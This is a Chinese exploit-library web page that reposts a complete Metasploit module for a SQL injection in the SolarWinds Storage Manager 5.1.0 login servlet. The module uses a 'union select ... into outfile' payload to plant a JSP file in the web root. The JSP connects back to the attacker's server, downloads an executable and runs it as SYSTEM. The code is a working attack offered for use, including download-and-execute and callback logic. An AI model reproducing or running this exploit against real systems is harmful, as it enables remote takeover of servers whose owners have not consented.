Solarwinds_Storage_Manager_5.1.0_SQL注入漏洞

# Solarwinds Storage Manager 5.1.0 SQL注入漏洞
==EXP==

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::TcpServer
 include Msf::Exploit::EXE

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Solarwinds Storage Manager 5.1.0 SQL Injection",
   'Description'    => %q{
     This module exploits a SQL injection found in Solarwinds Storage Manager
    login interface.  It will send a malicious SQL query to create a JSP file
    under the web root directory, and then let it download and execute our malicious
    executable under the context of SYSTEM.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'r@b13$', # Original discovery by Digital Defense VRT
     'muts',   # PoC
     'sinn3r'  # Metasploit
    ],
   'References'     =>
    [
     ['EDB', '18818'],
     ['URL', 'http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html'],
     ['URL', 'http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm']
    ],
   'Payload'        =>
    {
     'BadChars' => "\x00",
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "none"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     # Win XP / 2003 / Vista / Win 7 / etc
     ['Windows Universal', {}]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Dec 7 2011",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptPort.new('RPORT', [true, 'The target port', 9000])
   ], self.class)
 end


 #
 # A very gentle check to see if Solarwinds Storage Manage exists or not
 #
 def check
  res = send_request_raw({
   'method' => 'GET',
   'uri'    => '/LoginServlet'
  })

  if res and res.body =~ /\\SolarWinds \- Storage Manager\<\/title\>/ and
             res.body =~ /\<img decoding="async" style="padding\-top:30px;" src="\/images\/logo_solarwinds_login\.png" width="163" height="70" alt="SolarWinds Storage Manager"\>/
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCode::Safe
  end
 end


 #
 # Remove the JSP once we get a shell.
 # We cannot delete the executable because it will still be in use.
 #
 def on_new_session(cli)
  if cli.type != 'meterpreter'
   print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
   return
  end

  cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

  begin
   jsp = @outpath.gsub(/\//, "\\\\")
   jsp = jsp.gsub(/"/, "")
   vprint_status("#{rhost}:#{rport} - Deleting: #{jsp}")
   cli.fs.file.rm(jsp)
   print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
  rescue ::Exception => e
   print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
  end
 end


 #
 # Transfer the malicious executable to our victim
 #
 def on_client_connect(cli)
  print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
  cli.put(@native_payload)
  service.close_client(cli)
 end


 #
 # Generate a download+exe JSP payload
 #
 def generate_jsp_payload
  my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
  my_port = datastore['SRVPORT']

  # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
  # This will download our malicious executable in base64 format, decode it back,
  # save it as a temp file, and then finally execute it.
  jsp = %Q|
  <%@page import="java.io.*"%>
  <%@page import="java.net.*"%>
  <%@page import="sun.misc.BASE64Decoder"%>

  <%
  StringBuffer buf = new StringBuffer();
  byte[] shellcode = null;
  BufferedOutputStream outstream = null;
  try {
   Socket s = new Socket("#{my_host}", #{my_port});
   BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
   while (buf.length() < #{@native_payload.length}) {
    buf.append( (char) r.read());
   }

   BASE64Decoder decoder = new BASE64Decoder();
   shellcode = decoder.decodeBuffer(buf.toString());

   File temp = File.createTempFile("#{@native_payload_name}", ".exe");
   String path = temp.getAbsolutePath();

   outstream = new BufferedOutputStream(new FileOutputStream(path));
   outstream.write(shellcode);
   outstream.close();

   Process p = Runtime.getRuntime().exec(path);
  } catch (Exception e) {}
  %>
  |

  jsp = jsp.gsub(/\n/, '')
  jsp = jsp.gsub(/\t/, '')

  jsp.unpack("H*")[0]
 end


 #
 # Run the actual exploit
 #
 def inject_exec
  # This little lag is meant to ensure the TCP server runs first before the requests
  select(nil, nil, nil, 1)

  # Inject our JSP payload
  print_status("#{rhost}:#{rport} - Sending JSP payload")
  pass = rand_text_alpha(rand(10)+5)
  hex_jsp  = generate_jsp_payload

  res = send_request_cgi({
   'method'    => 'POST',
   'uri'       => '/LoginServlet',
   'headers'   => {
    'Accept-Encoding' => 'identity'
   },
   'vars_post'  => {
    'loginState' => 'checkLogin',
    'password'   => pass,
    'loginName'  => "AAA' union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile #{@outpath}#"
   }
  })

  # Pick up the cookie, example:
  # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB
  if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/
   cookie = "JSESSIONID=#{$1}"
  else
   print_error("Unable to get a session ID")
   return
  end

  # Trigger the JSP
  print_status("#{rhost}:#{rport} - Trigger JSP payload")
  send_request_cgi({
   'method'    => 'POST',
   'uri'       => '/LoginServlet',
   'headers'   => {
    'Cookie' => cookie,
    'Accept-Encoding' => 'identity'
   },
   'vars_post' => {
    'loginState' => 'checkLogin',
    'password'   => pass,
    'loginName'  => "1' or 1=1#--"
   }
  })

  res = send_request_raw({
   'method'  => 'POST',
   'uri'     => "/#{@jsp_name + '.jsp'}",
   'headers' => {
    'Cookie' => cookie
   }
  })

  handler
 end


 #
 # The server must start first, and then we send the malicious requests
 #
 def exploit
  # Avoid passing this as an argument for performance reasons
  # This is in base64 is make sure our file isn't mangled
  @native_payload      = [generate_payload_exe].pack("m*")
  @native_payload_name = rand_text_alpha(rand(6)+3)
  @jsp_name            = rand_text_alpha(rand(6)+3)
  @outpath             = "\"C:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/#{@jsp_name + '.jsp'}\""

  begin
   t = framework.threads.spawn("reqs", false) { inject_exec }
   print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
   super
  ensure
   t.kill
  end
 end
end


</pre>
                    </div>
        <div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有,未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://bdziyi.com/category/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>漏洞库</a><br></div>    </div>
    <div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2237"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><a href="javascript:;" data-toggle="modal" data-target="#rewards-modal-1" data-remote="https://bdziyi.com/wp-admin/admin-ajax.php?id=1&action=user_rewards_modal" class="rewards action action-rewards"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-money"></use></svg><text>赞赏</text></a><span class="hover-show dropup action action-share">
        <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone"  target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https%3A%2F%2Fbdziyi.com%2F2237%2F&title=Solarwinds_Storage_Manager_5.1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E-%E6%A3%89%E8%8A%B1%E7%B3%96%E4%BC%9A%E5%91%98%E7%AB%99&pics=%5C%2Fimages%5C%2Flogo_solarwinds_login%5C.png&summary=%23%20Solarwinds%20Storage%20Manager%205.1.0%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20%3D%3DEXP%3D%3D%20%23%23%20%23%20This%20file%20is%20part%20of%20the%20Metasploit%20Framework%20and%20may%20be%20subject%20to%20%23%20redistribution%20and%20commercial%20restrictions.%20Please%20see%20the%20Metasploit%20%23%20Framework%20web%20site%20for%20more%20information%20on%20licensing%20and%20terms%20of%20use.%20%23%20http%3A%2F%2Fmetasploit.com%2Fframework%2F%20%23%23%20require%20%27..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo"  target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https%3A%2F%2Fbdziyi.com%2F2237%2F&title=Solarwinds_Storage_Manager_5.1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E-%E6%A3%89%E8%8A%B1%E7%B3%96%E4%BC%9A%E5%91%98%E7%AB%99&pic=%5C%2Fimages%5C%2Flogo_solarwinds_login%5C.png&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq"  target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https%3A%2F%2Fbdziyi.com%2F2237%2F&title=Solarwinds_Storage_Manager_5.1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E-%E6%A3%89%E8%8A%B1%E7%B3%96%E4%BC%9A%E5%91%98%E7%AB%99&pics=%5C%2Fimages%5C%2Flogo_solarwinds_login%5C.png&desc=%23%20Solarwinds%20Storage%20Manager%205.1.0%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20%3D%3DEXP%3D%3D%20%23%23%20%23%20This%20file%20is%20part%20of%20the%20Metasploit%20Framework%20and%20may%20be%20subject%20to%20%23%20redistribution%20and%20commercial%20restrictions.%20Please%20see%20the%20Metasploit%20%23%20Framework%20web%20site%20for%20more%20information%20on%20licensing%20and%20terms%20of%20use.%20%23%20http%3A%2F%2Fmetasploit.com%2Fframework%2F%20%23%23%20require%20%27..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2237" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://bdziyi.com/2237/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2237"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author">
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.cn/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.cn/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.cn/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共41篇帖子" href="https://bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>41</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.5W+篇文章" href="https://bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.5W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共991条评论" href="https://bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>991</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共432个粉丝" href="https://bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>432</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 446W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>446W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div>
                    
                </div>
            </div>
            <div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/11/20241126051508458.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册(1.9.2版本 26.8.13更新)-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册(1.9.2版本 26.8.13更新)</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册(1.9.2版本 26.8.13更新)</div><div class="px12 opacity8 mt6"><item>2026年4月5日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4.7W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/57589/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/biji/202506011606395.png" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="px12 opacity8 mt6"><item>2025年7月3日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.6W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2025/03/20250310133450331.png" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="px12 opacity8 mt6"><item>2024年12月17日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 9028</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/58468/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/04/20240401083217388.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 7045</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240626133442218.png" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>2024年3月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4676</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/57026/"><div class="graphic hover-zoom-img em09 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2025/07/20250728101120497.png" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="ViewState 利用工具 SharpViewStateKing 2025-04-10 v4.5.3 版本 屏蔽更新-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">ViewState 利用工具 SharpViewStateKing 2025-04-10 v4.5.3 版本 屏蔽更新</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">ViewState 利用工具 SharpViewStateKing 2025-04-10 v4.5.3 版本 屏...</div><div class="px12 opacity8 mt6"><item>2025年7月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4549</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div>
        </div>
    </div>    <div class="theme-box" style="height:99px">
        <nav class="article-nav">
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://bdziyi.com/2236/">
                    <p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i
                            class="fa fa-angle-left em12 mr6"></i>上一篇</p>
                    <div class="text-ellipsis-2">
                        CVE-2019-12744_Seeddms_5.1.10_遠程代碼執行漏洞                    </div>
                </a>
            </div>
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://bdziyi.com/2238/">
                    <p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i
                            class="fa fa-angle-right em12"></i></p>
                    <div class="text-ellipsis-2">
                        CVE-2021-3449_OpenSSL拒絕服務漏洞_ru                    </div>
                </a>
            </div>
        </nav>
    </div>
<div class="theme-box relates relates-thumb">
            <div class="box-body notop">
                <div class="title-theme">相关推荐</div>
            </div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://bdziyi.com/58468/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/04/20240401083217388.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 7045</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/58091/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324135327296.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶EAS autoLogin.jsp远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶EAS autoLogin.jsp远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2707</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/58988/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324135327296.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="百度网盘Windows客户端存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">百度网盘Windows客户端存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">百度网盘Windows客户端存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年9月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2416</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/58241/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324135327296.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="大华 evo-runs/v1.0/receive RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">大华 evo-runs/v1.0/receive RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">大华 evo-runs/v1.0/receive RCE</div><div class="px12 opacity8 mt6"><item>2025年7月11日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2165</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/60915/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324135327296.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="FineReport 帆软报表前台远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">FineReport 帆软报表前台远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">FineReport 帆软报表前台远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年12月24日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2154</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://bdziyi.com/58301/"><div class="graphic hover-zoom-img mb10 style-3" style="--cover-height-scale: 70%;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324135327296.jpg" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="wps 远程代码执行 rce-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">wps 远程代码执行 rce</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">wps 远程代码执行 rce</div><div class="px12 opacity8 mt6"><item>2025年7月18日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2036</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments">
	<div class="box-body notop">
		<div class="title-theme">评论			<small>抢沙发</small></div>
	</div>

	<div class="no_webshot main-bg theme-box box-body radius8 main-shadow">
									<div class="comment-signarea text-center box-body radius8">
					<h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3>
					<p>
						<a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a>
						<a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a>					</p>
					<p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fbdziyi.com%2F2237%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div>				</div>
									<div id="postcomments">
			<ol class="commentlist list-unstyled">
				<div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div>			</ol>
		</div>
			</div>
</div>        </div>
    </div>
    <div class="sidebar">
	<div class="zib-widget-wrap"><div class="widget-container"><div class=""><div class="box-body notop"><div class="title-theme">作者</div></div><div class="widget-content"><div class="mb20"><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img  class="lazyload fit-cover user-cover user-cover-id-1" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.cn/vip/2024/11/20241126045446604.png" alt="用户封面"></div>
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.cn/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.cn/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.cn/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共41篇帖子" href="https://bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>41</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.5W+篇文章" href="https://bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.5W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共991条评论" href="https://bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>991</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共432个粉丝" href="https://bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>432</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 446W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>446W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div>
                    
                </div>
            </div>
            <div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67472/">七月,我用AI挖了22万赏金,我想给你一点建议</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67416/">AI 挖洞、SRC  Skills、仿生人类四层记忆系统</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67366/">无境靶场 openvpn安装包</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67330/">web漏洞合集描述和修复建议.xlsx</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67282/">面试题目(红队方向)</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://bdziyi.com/67280/">WordPress 未授权RCE CVE-2026-63030</a></div></div>
        </div>
